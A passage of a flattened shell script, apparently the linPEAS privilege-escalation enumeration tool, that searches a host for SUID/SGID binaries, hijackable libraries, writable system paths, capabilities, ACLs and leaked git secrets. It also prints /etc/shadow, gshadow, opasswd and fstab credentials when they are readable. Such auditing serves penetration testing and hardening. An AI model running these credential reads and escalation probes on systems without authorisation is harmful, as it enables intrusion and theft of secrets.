"s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"web.*\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,web.*\.config$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,winscp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wsl\.exe$" | while
read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wsl\.exe$,${SED_RED},"; done;
echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"plum\.sqlite$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "plum.sqlite"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "plum\.sqlite$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,plum\.sqlite$,${SED_RED},"; done; echo ""; fi if [
"$PSTORAGE_OTHER_INTERESTING" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Other Interesting Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.bashrc$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found ".bashrc"; fi; fi; printf "%s"
"$PSTORAGE_OTHER_INTERESTING" | grep -E "\.bashrc$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.google_authenticator$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found ".google_authenticator"; fi; fi;
printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.google_authenticator$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.google_authenticator$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"hosts\.equiv$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "hosts.equiv"; fi; fi; printf "%s"
"$PSTORAGE_OTHER_INTERESTING" | grep -E "hosts\.equiv$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo "";
if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.lesshst$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found ".lesshst"; fi; fi; printf "%s"
"$PSTORAGE_OTHER_INTERESTING" | grep -E "\.lesshst$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.plan$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found ".plan"; fi; fi; printf "%s"
"$PSTORAGE_OTHER_INTERESTING" | grep -E "\.plan$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.profile$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found ".profile"; fi; fi; printf "%s"
"$PSTORAGE_OTHER_INTERESTING" | grep -E "\.profile$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.recently-used\.xbel$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found ".recently-used.xbel"; fi; fi; printf
"%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.recently-used\.xbel$" | while
read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.rhosts$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found ".rhosts"; fi; fi; printf "%s"
"$PSTORAGE_OTHER_INTERESTING" | grep -E "\.rhosts$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E
\"\.sudo_as_admin_successful$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
".sudo_as_admin_successful"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" |
grep -E "\.sudo_as_admin_successful$" | while read f; do ls -ld "$f" 2>/dev/null
| sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo ""; fi if !
[ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then print_2title "Checking
leaks in git repositories" printf "%s\n" "$PSTORAGE_GITHUB" | while read f; do
if echo "$f" | grep -Eq ".git$"; then git_dirname=$(dirname "$f") if [
"$MACPEAS" ]; then execBin "GitLeaks (checking $git_dirname)"
"https://github.com/zricethezav/gitleaks" "$FAT_LINPEAS_GITLEAKS_MACOS" "detect
-s '$git_dirname' -v | grep -E 'Description|Match|Secret|Message|Date'" else
execBin "GitLeaks (checking $git_dirname)"
"https://github.com/zricethezav/gitleaks" "$FAT_LINPEAS_GITLEAKS_LINUX" "detect
-s '$git_dirname' -v | grep -E 'Description|Match|Secret|Message|Date'" fi fi
done fi fi echo '' echo '' if [ "$WAIT" ]; then echo "Press enter to continue";
read "asd"; fi if echo $CHECKS | grep -q interesting_perms_files; then
print_title "Files with Interesting Permissions"
########################################### #-) Files with Interesting
Permissions (-# ###########################################
check_critial_root_path(){ folder_path="$1" if [ -w "$folder_path" ]; then echo
"You have write privileges over $folder_path" | sed -${E}
"s,.*,${SED_RED_YELLOW},"; fi if [ "$(find $folder_path -type f '(' '(' -user
$USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')'
')' 2>/dev/null)" ]; then echo "You have write privileges over $(find
$folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '('
-perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E}
"s,.*,${SED_RED_YELLOW},"; fi if [ "$(find $folder_path -type f -not -user root
2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find
$folder_path -type f -not -user root 2>/dev/null)"; fi } ##-- IPF) SUID
print_2title "SUID - Check easy privesc, exploits and write perms" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
if ! [ "$STRINGS" ]; then echo_not_found "strings" fi if ! [ "$STRACE" ]; then
echo_not_found "strace" fi suids_files=$(find $ROOT_FOLDER -perm -4000 -type f !
-path "/dev/*" 2>/dev/null) for s in $suids_files; do s=$(ls -lahtr "$s") # If
starts like "total 332K" then no SUID bin was found and xargs just executed "ls"
in the current folder if echo "$s" | grep -qE "^total"; then break; fi
sname="$(echo $s | awk '{print $9}')" if [ "$sname" = "." ] || [ "$sname" = ".."
]; then true # Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," elif ! [
"$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check
exploits) echo "You can write SUID file: $sname" | sed -${E}
"s,.*,${SED_RED_YELLOW}," else c="a" for b in $sidB; do if echo $s | grep -q
$(echo $b | cut -d % -f 1); then echo "$s" | sed -${E} "s,$(echo $b | cut -d %
-f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," c="" break; fi done;
if [ "$c" ]; then if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE
"$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" ||
echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then echo "$s"
| sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed
-${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E}
"s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else
echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC
if ! [ "$FAST" ]; then if [ "$STRINGS" ]; then $STRINGS "$sname" 2>/dev/null |
sort | uniq | while read sline; do sline_first="$(echo "$sline" | cut -d ' '
-f1)" if echo "$sline_first" | grep -qEv "$cfuncs"; then if echo "$sline_first"
| grep -q "/" && [ -f "$sline_first" ]; then # If a path if [ -O "$sline_first"
] || [ -w "$sline_first" ]; then # And modifiable printf "$ITALIC --- It looks
like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify
it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi else #If not a
path if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null |
grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then # Check if existing
binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing
$RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)
(https://tinyurl.com/suidpath)\n" fi fi fi done fi if [ "$LDD" ] || [ "$READELF"
]; then echo "$ITALIC --- Checking for writable dependencies of $sname...$NC" fi
if [ "$LDD" ]; then "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E}
"s,$Wfolders,${SED_RED_YELLOW},g" fi if [ "$READELF" ]; then "$READELF" -d
"$sname" | grep PATH | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" fi if [
"$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then
printf $ITALIC echo
"----------------------------------------------------------------------------------------"
echo " --- Trying to execute $sname with strace in order to look for hijackable
libraries..." OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH export LD_LIBRARY_PATH=""
timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed
-${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" printf $NC export
LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH echo
"----------------------------------------------------------------------------------------"
echo "" fi fi fi fi fi done; echo "" ##-- IPF) SGID print_2title "SGID"
print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*"
2>/dev/null) for s in $sgids_files; do s=$(ls -lahtr "$s") # If starts like
"total 332K" then no SUID bin was found and xargs just executed "ls" in the
current folder if echo "$s" | grep -qE "^total";then break; fi sname="$(echo $s
| awk '{print $9}')" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then true
#Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then echo "You own
the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," elif ! [ "$IAMROOT" ] && [
-w "$sname" ]; then # If write permision, win found (no check exploits) echo
"You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else
c="a" for b in $sidB; do if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then
echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b |
cut -d % -f 2)${C}[0m," c="" break; fi done; if [ "$c" ]; then if echo "$s" |
grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE
"$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" ||
echo "$s" | grep -qE "$sidVB2"; then echo "$s" | sed -${E}
"s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E}
"s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E}
"s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else
echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC
if ! [ "$FAST" ]; then if [ "$STRINGS" ]; then $STRINGS "$sname" | sort | uniq |
while read sline; do sline_first="$(echo $sline | cut -d ' ' -f1)" if echo
"$sline_first" | grep -qEv "$cfuncs"; then if echo "$sline_first" | grep -q "/"
&& [ -f "$sline_first" ]; then # If a path if [ -O "$sline_first" ] || [ -w
"$sline_first" ]; then # And modifiable printf "$ITALIC --- It looks like
$RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it
(strings line: $sline)\n" fi else # If not a path if [ ${#sline_first} -gt 2 ]
&& command -v "$sline_first" 2>/dev/null | grep -q '/'; then # Check if existing
binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing
$RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
fi fi fi done fi if [ "$LDD" ] || [ "$READELF" ]; then echo "$ITALIC ---
Checking for writable dependencies of $sname...$NC" fi if [ "$LDD" ]; then
"$LDD" "$sname" | grep -E "$Wfolders" | sed -${E}
"s,$Wfolders,${SED_RED_YELLOW},g" fi if [ "$READELF" ]; then "$READELF" -d
"$sname" | grep PATH | grep -E "$Wfolders" | sed -${E}
"s,$Wfolders,${SED_RED_YELLOW},g" fi if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ !
"$SUPERFAST" ]; then printf "$ITALIC" echo " --- Trying to execute $sname with
strace in order to look for hijackable libraries..." timeout 2 "$STRACE"
"$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E}
"s,open|access|No such file,${SED_RED}$ITALIC,g" printf "$NC" echo "" fi fi fi
fi fi done; echo "" ##-- IPF) Misconfigured ld.so if ! [ "$SEARCH_IN_FOLDER" ]
&& ! [ "$IAMROOT" ]; then print_2title "Checking misconfigurations of ld.so"
print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so" if [ -f
"/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then echo "You have write
privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},"; printf
$RED$ITALIC"/etc/ld.so.conf\n"$NC; else printf
$GREEN$ITALIC"/etc/ld.so.conf\n"$NC; fi echo "Content of /etc/ld.so.conf:" cat
/etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" #
Check each configured folder cat /etc/ld.so.conf 2>/dev/null | while read l; do
if echo "$l" | grep -q include; then ini_path=$(echo "$l" | cut -d " " -f 2)
fpath=$(dirname "$ini_path") if [ -d "/etc/ld.so.conf" ] && [ -w "$fpath" ];
then echo "You have write privileges over $fpath" | sed -${E}
"s,.*,${SED_RED_YELLOW},"; printf $RED_YELLOW$ITALIC"$fpath\n"$NC; else printf
$GREEN$ITALIC"$fpath\n"$NC; fi if [ "$(find $fpath -type f '(' '(' -user $USER
')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')'
2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f
'(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '('
$wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi for
f in $fpath/*; do if [ -w "$f" ]; then echo "You have write privileges over $f"
| sed -${E} "s,.*,${SED_RED_YELLOW},"; printf $RED_YELLOW$ITALIC"$f\n"$NC; else
printf $GREEN$ITALIC" $f\n"$NC; fi cat "$f" | grep -v "^#" | while read l2; do
if [ -f "$l2" ] && [ -w "$l2" ]; then echo "You have write privileges over $l2"
| sed -${E} "s,.*,${SED_RED_YELLOW},"; printf $RED_YELLOW$ITALIC" - $l2\n"$NC;
else echo $ITALIC" - $l2"$NC | sed -${E} "s,$l2,${SED_GREEN}," | sed -${E}
"s,$Wfolders,${SED_RED_YELLOW},g"; fi done done fi done echo "" if [ -f
"/etc/ld.so.preload" ] && [ -w "/etc/ld.so.preload" ]; then echo "You have write
privileges over /etc/ld.so.preload" | sed -${E} "s,.*,${SED_RED_YELLOW},"; else
printf $ITALIC$GREEN"/etc/ld.so.preload\n"$NC; fi cat /etc/ld.so.preload
2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" cat /etc/ld.so.preload
2>/dev/null | while read l; do if [ -f "$l" ] && [ -w "$l" ]; then echo "You
have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi done fi
##-- IPF) Capabilities if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title
"Capabilities" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities"
if [ "$(command -v capsh)" ]; then print_3title "Current shell capabilities" cat
"/proc/$$/status" | grep Cap | while read -r cap_line; do cap_name=$(echo
"$cap_line" | awk '{print $1}') cap_value=$(echo "$cap_line" | awk '{print $2}')
if [ "$cap_name" = "CapEff:" ]; then echo "$cap_name $(capsh
--decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" else echo
"$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")"
fi done echo "" print_3title "Parent process capabilities" cat
"/proc/$PPID/status" | grep Cap | while read -r cap_line; do cap_name=$(echo
"$cap_line" | awk '{print $1}') cap_value=$(echo "$cap_line" | awk '{print $2}')
if [ "$cap_name" = "CapEff:" ]; then echo "$cap_name $(capsh
--decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" else echo
"$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")"
fi done echo "" else print_3title "Current shell capabilities" (cat
"/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd:
0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status"
echo "" print_3title "Parent proc capabilities" (cat "/proc/$PPID/status" | grep
Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},")
2>/dev/null || echo_not_found "/proc/$PPID/status" echo "" fi echo "" echo
"Files with capabilities (limited to 50):" getcap -r / 2>/dev/null | head -n 50
| while read cb; do capsVB_vuln="" for capVB in $capsVB; do capname="$(echo
$capVB | cut -d ':' -f 1)" capbins="$(echo $capVB | cut -d ':' -f 2)" if [
"$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ];
then echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," capsVB_vuln="1" break fi
done if ! [ "$capsVB_vuln" ]; then echo "$cb" | sed -${E} "s,$capsB,${SED_RED},"
fi if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then echo "$cb
is writable" | sed -${E} "s,.*,${SED_RED}," fi done echo "" fi ##-- IPF) Users
with capabilities if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ];
then print_2title "Users with capabilities" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities"
if [ -f "/etc/security/capability.conf" ]; then grep -v '^#\|none\|^$'
/etc/security/capability.conf 2>/dev/null | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed
-${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," else
echo_not_found "/etc/security/capability.conf" fi echo "" fi ##-- IPF) AppArmor
profiles to prevent suid/capabilities abuse if ! [ "$SEARCH_IN_FOLDER" ]; then
if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then print_2title
"AppArmor binary profiles" ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" |
grep "\." echo "" fi fi ##-- IPF) Files with ACLs print_2title "Files with ACLs
(limited to 50)" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls" if ! [
"$SEARCH_IN_FOLDER" ]; then ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt
/sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in
searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," |
sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," |
sed "s,$USER,${SED_RED}," else ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER
2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n
70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E}
"s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed
"s,$USER,${SED_RED}," fi if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST"
] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow)
ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d:
" | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E}
"s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed
"s,$USER,${SED_RED}," fi echo "" ##-- IPF) Files with ResourceFork #if [
"$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT
LATER # print_2title "Files with ResourceFork" # print_info
"https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads"
# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' |
awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep
"com.apple.ResourceFork" #fi #echo "" ##-- IPF) Files (scripts) in
/etc/profile.d/ if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Files (scripts)
in /etc/profile.d/" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files"
if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a
MacOS (ls -la /etc/profile.d/ 2>/dev/null | sed -${E}
"s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/"
check_critial_root_path "/etc/profile" check_critial_root_path "/etc/profile.d/"
fi echo "" fi ##-- IPF) Files (scripts) in /etc/init.d/ if ! [
"$SEARCH_IN_FOLDER" ]; then print_2title "Permissions in init, init.d, systemd,
and rc.d" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d"
if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a
MacOS check_critial_root_path "/etc/init/" check_critial_root_path
"/etc/init.d/" check_critial_root_path "/etc/rc.d/init.d"
check_critial_root_path "/usr/local/etc/rc.d" check_critial_root_path
"/etc/rc.d" check_critial_root_path "/etc/systemd/" check_critial_root_path
"/lib/systemd/" fi echo "" fi ##-- IPF) Hashes in passwd file if ! [
"$SEARCH_IN_FOLDER" ]; then print_list "Hashes inside passwd file? ........... "
if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group
2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db
/etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else
echo_no fi ##-- IPF) Writable in passwd file print_list "Writable passwd file?
................ " if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable"
| sed -${E} "s,.*,${SED_RED_YELLOW}," elif [ -w "/etc/pwd.db" ]; then echo
"/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," elif [ -w
"/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E}
"s,.*,${SED_RED_YELLOW}," else echo_no fi ##-- IPF) Credentials in fstab
print_list "Credentials in fstab/mtab? ........... " if grep -qE
"(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab
2>/dev/null; then grep -E
"(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab
2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi ##-- IPF) Read shadow
files print_list "Can I read shadow files? ............. " if [ "$(cat
/etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow-
/etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow
/etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd
/etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," else echo_no fi
print_list "Can I read shadow plists? ............ " possible_check="" (for l in
/var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l";
defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ];
then echo_no; fi) 2>/dev/null || echo_no print_list "Can I write shadow plists?
........... " possible_check="" (for l in /var/db/dslocal/nodes/Default/users/*;
do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [
"$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no ##-- IPF) Read
opasswd file print_list "Can I read opasswd file? ............. " if [ -r
"/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo ""
else echo_no fi ##-- IPF) network-scripts print_list "Can I write in
network-scripts? ...... " if ! [ "$IAMROOT" ] && [ -w
"/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on
/etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," elif [
"$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user
$USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')'
')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find
/etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')'
-or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')'
2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," else echo_no fi ##-- IPF)
Read root dir print_list "Can I read root folder? .............. " (ls -al
/root/ 2>/dev/null | grep -vi "total 0") || echo_no echo "" fi ##-- IPF) Root
files in home dirs if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Searching
root files in home dirs (limit 30)" (find $HOMESEARCH -user root 2>/dev/null |
head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed
"s,$USER,${SED_RED},g") || echo_not_found echo "" fi ##-- IPF) Others files in
my dirs if ! [ "$IAMROOT" ]; then print_2title "Searching folders owned by me
containing others files on it (limit 100)" (find $ROOT_FOLDER -type d -user
"$USER" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -n 100 | while
read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec
ls -l {} \; 2>/dev/null; done) | sort | uniq | sed -${E}
"s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed
-${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed
"s,root,${C}[1;13m&${C}[0m,g" echo "" fi ##-- IPF) Readable files belonging to
root and not world readable if ! [ "$IAMROOT" ]; then print_2title "Readable
files belonging to root and readable by me but not world readable" (find
$ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null |
grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f"
2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found echo ""
fi ##-- IPF) Interesting writable files by ownership or all if ! [ "$IAMROOT" ];
then print_2title "Interesting writable files owned by me or writable by
everyone (not in Home) (max 500)" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
# In the next file, you need to specify type "d" and "f" to avoid fake link
files apparently writable by all obmowbe=$(find $ROOT_FOLDER '(' -type f -or
-type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*"
! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" |
sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if
(act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if
(cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"};
pre=act }' | head -n500) printf "%s\n" "$obmowbe" | while read entry; do if echo
"$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then
printf $ITALIC"$entry\n"$NC; elif echo "$entry" | grep -qE "$writeVB"; then echo
"$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else echo "$entry" | sed
-${E} "s,$writeB,${SED_RED}," fi done echo "" fi ##-- IPF) Interesting writable
files by group if ! [ "$IAMROOT" ]; then print_2title "Interesting GROUP
writable files (not in Home) (max 500)" print_info
"https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files"
for g in $(groups); do iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')'
-group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*"
2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){
